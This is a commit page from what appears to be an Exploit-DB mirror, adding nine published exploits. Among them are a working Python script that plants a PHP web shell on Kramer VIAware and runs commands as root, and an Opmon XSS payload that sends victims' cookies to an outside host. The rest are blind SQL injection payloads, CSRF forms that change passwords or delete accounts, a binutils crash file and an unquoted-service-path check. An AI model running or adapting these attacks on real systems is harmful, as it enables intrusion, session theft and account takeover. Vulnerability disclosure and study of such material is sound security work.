bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-04-08

Browse source 
9 changes to exploits/shellcodes

Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path
binutils 2.37 - Objdump Segmentation Fault
Kramer VIAware - Remote Code Execution (RCE) (Root)
Opmon 9.11 - Cross-site Scripting
Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)
KLiK Social Media Website 1.0 - 'Multiple' SQLi
minewebcms 1.15.2 - Cross-site Scripting (XSS)
qdPM 9.2 - Cross-site Request Forgery (CSRF)
ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
This commit is contained in:
Offensive Security 2022-04-08 05:01:37 +00:00
parent 54b7907ae6
commit 50cc2edafe
10 changed files with 503 additions and 0 deletions
exploits
hardware/remote
50856.py
linux/local
50858.txt
multiple/remote
50857.txt
php/webapps
50850.py50851.txt50853.txt50854.txt50855.txt
windows/local
50852.txt
files_exploits.csv

65
exploits/hardware/remote/50856.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: Remote Code Execution as Root on KRAMER VIAware
# Date: 31/03/2022
# Exploit Author: sharkmoos
# Vendor Homepage: https://www.kramerav.com/
# Software Link: https://www.kramerav.com/us/product/viaware
# Version: *
# Tested on: ViaWare Go (Linux)
# CVE : CVE-2021-35064, CVE-2021-36356
import sys, urllib3
from requests import get, post
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def writeFile(host):
headers = {
"Host": f"{host}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "text/html, */*",
"Accept-Language": "en-GB,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Sec-Gpc": "1",
"Te": "trailers",
"Connection": "close"
}
# write php web shell into the Apache web directory
data = {
"radioBtnVal":"""<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}?>""",
"associateFileName": "/var/www/html/test.php"}
post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, verify=False)
def getResult(host, cmd):
# query the web shell, using rpm as sudo for root privileges
file = get(f"https://{host}/test.php?cmd=" + "sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}'", verify=False)
pageText = file.text
if len(pageText) < 1:
result = "Command did not return a result"
else:
result = pageText
return result
def main(host):
# upload malicious php
writeFile(host)
command = ""
while command != "exit":
# repeatedly query the webshell
command = input("cmd:> ").strip()
print(getResult(host, command))
exit()
if __name__ == "__main__":
if len(sys.argv) == 2:
main(sys.argv[1])
else:
print(f"Run script in format:\n\n\tpython3 {sys.argv[0]} target\n")

83
exploits/linux/local/50858.txt Normal file
View file

@ -0,0 +1,83 @@
# Exploit Title: binutils 2.37 - Objdump Segmentation Fault
# Date: 2021-11-03
# Exploit Author: p3tryx
# Vendor Homepage: https://www.gnu.org/software/binutils/
# Version: binutils 2.37
# Tested on: Ubuntu 18.04
# CVE : CVE-2021-43149
Payload file
```
%223"\972\00\0083=Q333A111111114111113333<33A $$$\FF)$\80 1114
\00\80\99\00111111111111111-11111111111111111111111111111111111'111111111111111111
111111*111111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111
$%22622FF7FFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1))\FF)$1 1111
$%22111111111111111111111111111111111.1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101111111111111111111111111111111111111111111111111111111111111111111111111111622FF
\00\00\00FFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111
$%22622FF7FFFFFFFFF111111111111111111111111111111111111111111111111111111q1111111111111111111111111111111111111
1))\FF)$1 1111
$%22622FFFFFDFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111
$%22622FF7FFFFFFFFF11111111111111111,1FF\83 \81 \8D 1111
$%22622FF7FFFFFFFFFFFFFFF \FF
\00\80\99\00 1))\FF)$\80 1114
\00\80\99\0011111111111111)111111111111111111111111111111111111111111111111111111
1))\FF)$1 1111
$%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 { \8D 1111
$%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1))\FF)$1 1111
$%2262211111111111111111111111111111111111111111111\00\00
\00111111111111111111111111111111111111111111111FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF
\81 \8D 111
$%22622FFF1111111111111111111FF\83))\FF)$1 1111
$%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF2E2CF9FFFF \98 \81 \8D 1111
$%22622FF7FFFFFFFFF1111111111111111111111111111111111111111111111111111111111111111111111111111
1))\FF)$1 1111
$%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111
$%22622FF7FFFFFFFFF1111111111111111111FF\83 \81 \8D 1111
$%22622FF7FFFFFFFFFFFFFFF \FF
\00\80\99 1))\FF)$\80 1114
\00\80\99\00111111111111111111111111111111111111111111111111111'111111111111111111
1111111111111111111111111111111>11111111111d\00\00\00111111111111111111
111111111111111111111111111111111111111111111111111*111111111111111111111111.1111111111111111111111111111111;111011111111111111111111111111111111111111111111111111\EA111111111111111
$%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111.1111111111111111111111$1
1111
$%22622FFFFFFF1111111111111111111111111111\BF\BF\BF\BF\BF\BF1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!11111111111111'111111111111111111
111111111111@111111111111111111d\001111
\0011111111111111111111111111111111111111111111111*1111111111111111111111111111111111111111111111111111111111110111111111151111111111111111111111111111111111111111111111111111)111111111111111111111111111F111111111111111111111111
1111111FFFFFFFFFFLFFFFFFF11111111 111111111111111111111111111111111
$%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111P1111111111111111111111111111111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111N1111111111111111111111111111111111111111111111111
1111111111111111111111111111\FF\FF1111111117111111111111111111111111111111111))\FF)$11111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111111111111111111111111111111111111111@1111111111111111111111111111111111111111111111111111\00\00
\0011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111M111111R111111111111
111111111111 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1))\FF)$1 1I11
$%22622FFFFFF1FFFFFFFFFFFFFFFFFFFF222CFFFFFF \81 \8D 1111
$%22622FF7FFFFFFFFF111111111111
111111111111111111111111111111111111111111111 1))\FF)$1 1111
$%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF$%22622FFFFFFFFFFFFFMFFFFFFFFFFFFF222CFFFFFF
\81 \8D 1111
$%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111FFFFFF
\FF
\00\80\99\00 1))\FF)$\80 1111 \00\80\99\00a1))\FF)$1 1J11
$%22@22FF11111FFFFFFFFFFFFFF222$)$
```
RUN the POC
# binutils-2.37/binutils/objdump -T -D -x crash_2.37
ASAN:SIGSEGV
=================================================================
==27705==ERROR: AddressSanitizer: SEGV on unknown address
0x000000000000 (pc 0x000000000000 bp 0x7fffffffdee0 sp 0x7fffffffde38
T0)
==27705==Hint: pc points to the zero page.
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==27705==ABORTING

32
exploits/multiple/remote/50857.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Opmon 9.11 - Cross-site Scripting
# Date: 2021-06-01
# Exploit Author: p3tryx
# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time
# Version: 9.11
# Tested on: Chrome, IE and Firefox
# CVE : CVE-2021-43009
# URL POC:
<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>
Url-encoded Payload
%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E
```
*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};PAYLOAD&x=0&y=0
*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*
<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>
[search]=%27};
%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E
&x=0&y=0
```

140
exploits/php/webapps/50850.py Executable file
View file

File diff suppressed because one or more lines are too long

30
exploits/php/webapps/50851.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi
# Date: April 1st, 2022
# Exploit Author: corpse
# Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite
# Version: 1.0
# Tested on: Debian 11
Parameter: poll (GET)
Type: time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: poll=ELT(1079=1079,SLEEP(5))
Parameter: pollID (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS)
Parameter: voteOpt (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15

24
exploits/php/webapps/50853.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: minewebcms 1.15.2 - Cross-site Scripting (XSS)
# Google Dork: NA
# Date: 02/20/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://mineweb.org/
# Software Link: https://github.com/mineweb/minewebcms
# Version: 1.15.2
# Tested on: KALI OS
# CVE : CVE-2022-1163
#
---------------
Steps to Reproduce:-
=> Install the WebApp and Setup it
=> Login in to webAPP using Admin Creds.
=> Navigate to "http://localhost/MineWebCMS-1.15.2/admin/navbar"
=> Add/Edit a Link Select "Drop-Down Menu"
=> "Link Name" and "URL" Both Input are Vulnerable to Exploit Simple XSS
=> Payload : <script>alert(1);</script>
=> XSS will trigger on "http://localhost/MineWebCMS-1.15.2/" Aka WebApp HOME Page
Note : As you can see this simple payload working in those two inputs as normally . Whole WebApp Admin Input Structure is allow to do HTML Injection or XSS Injection
References: https://huntr.dev/bounties/44d40f34-c391-40c0-a517-12a2c0258149/

32
exploits/php/webapps/50854.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)
# Google Dork: NA
# Date: 03/27/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: KALI OS
# CVE : CVE-2022-26180
#
---------------
Steps to Exploit :
1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.
2) send it to victim.
<html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST">
<input type="hidden" name="sf&#95;method" value="put" />
<input type="hidden" name="users&#91;id&#93;" value="1" /> <!-- Change User ID Accordingly --->
<input type="hidden" name="users&#91;photo&#95;preview&#93;" value="" />
<input type="hidden" name="users&#91;name&#93;" value="AggressiveUser" />
<input type="hidden" name="users&#91;new&#95;password&#93;" value="TEST1122" />
<input type="hidden" name="users&#91;email&#93;" value="administrator&#64;Lulz&#46;com" />
<input type="hidden" name="users&#91;photo&#93;" value="" />
<input type="hidden" name="users&#91;culture&#93;" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

52
exploits/php/webapps/50855.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
# Date: 29/03/2022
# Exploit Author: Devansh Bordia
# Vendor Homepage: https://icehrm.com/
# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
# Version: 31.0.0.OS
#Tested on: Windows 10
# CVE: CVE-2022-26588
1. About - ICEHRM
IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.
2. Description:
The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.
3. Steps To Reproduce:
1.) Now login into the application and go to users.
2.) After this add an user with the name Devansh.
3.) Now try to delete the user and intercept the request in burp suite. We can see no CSRF Token in request.
4.) Go to any CSRF POC Generator: https://security.love/CSRF-PoC-Genorator/
5.) Now generate a csrf poc for post based requests with necessary parameters.
6.) Finally open that html poc and execute in the same browser session.
7.) Now if we refresh the page, the devansh is deleted to csrf vulnerability.
4. Exploit POC (Exploit.html)
<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="
http://localhost:8070/app/service.php">
<table>
<tr>
<td>t</td>
<td>
<input type="text" value="User" name="t">
</td>
</tr>
<tr>
<td>a</td>
<td>
<input type="text" value="delete" name="a">
</td>
</tr>
<tr>
<td>id</td>
<td>
<input type="text" value="6" name="id">
</td>
</tr>
</table>
<input type="submit" value="http://localhost:8070/app/service.php"> </form>
</html>

36
exploits/windows/local/50852.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path
# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)
# Version: 2020.2.20328.2050
# Date: 02/04/2022
# Vendor Homepage: http://gimmal.com/
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10
# CVE: CVE-2022-23909
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode | findstr /i
"sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v
"""
Sherpa Connector Service
Sherpa Connector Service C:\Program
Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe
Auto
C:\>sc qc "Sherpa Connector Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Sherpa Connector Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Sherpa Software\Sherpa
Connector\SherpaConnectorService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Sherpa Connector Service
DEPENDENCIES : wmiApSrv
SERVICE_START_NAME : LocalSystem

9
files_exploits.csv
View file

@ -11474,6 +11474,8 @@ id,file,description,date,author,type,platform,port
50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows,
50837,exploits/windows/local/50837.txt,"ProtonVPN 1.26.0 - Unquoted Service Path",1970-01-01,gemreda,local,windows,
50852,exploits/windows/local/50852.txt,"Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path",1970-01-01,"Manthan Chhabra",local,windows,
50858,exploits/linux/local/50858.txt,"binutils 2.37 - Objdump Segmentation Fault",1970-01-01,"Marlon Petry",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18658,6 +18660,8 @@ id,file,description,date,author,type,platform,port
50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware,
50847,exploits/multiple/remote/50847.py,"PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,b4keSn4ke,remote,multiple,
50848,exploits/hardware/remote/50848.py,"Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE)",1970-01-01,sharkmoos,remote,hardware,
50856,exploits/hardware/remote/50856.py,"Kramer VIAware - Remote Code Execution (RCE) (Root)",1970-01-01,sharkmoos,remote,hardware,
50857,exploits/multiple/remote/50857.txt,"Opmon 9.11 - Cross-site Scripting",1970-01-01,"Marlon Petry",remote,multiple,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44917,3 +44921,8 @@ id,file,description,date,author,type,platform,port
50845,exploits/php/webapps/50845.txt,"WordPress Plugin admin-word-count-column 2.2 - Local File Read",1970-01-01,"Hassan Khan Yusufzai",webapps,php,
50846,exploits/php/webapps/50846.txt,"CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
50849,exploits/php/webapps/50849.txt,"WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS",1970-01-01,0xB9,webapps,php,
50850,exploits/php/webapps/50850.py,"Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,minhnq22,webapps,php,
50851,exploits/php/webapps/50851.txt,"KLiK Social Media Website 1.0 - 'Multiple' SQLi",1970-01-01,corpse,webapps,php,
50853,exploits/php/webapps/50853.txt,"minewebcms 1.15.2 - Cross-site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
50854,exploits/php/webapps/50854.txt,"qdPM 9.2 - Cross-site Request Forgery (CSRF)",1970-01-01,"Chetanya Sharma",webapps,php,
50855,exploits/php/webapps/50855.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion",1970-01-01,"Devansh Bordia",webapps,php,

Can't render this file because it is too large.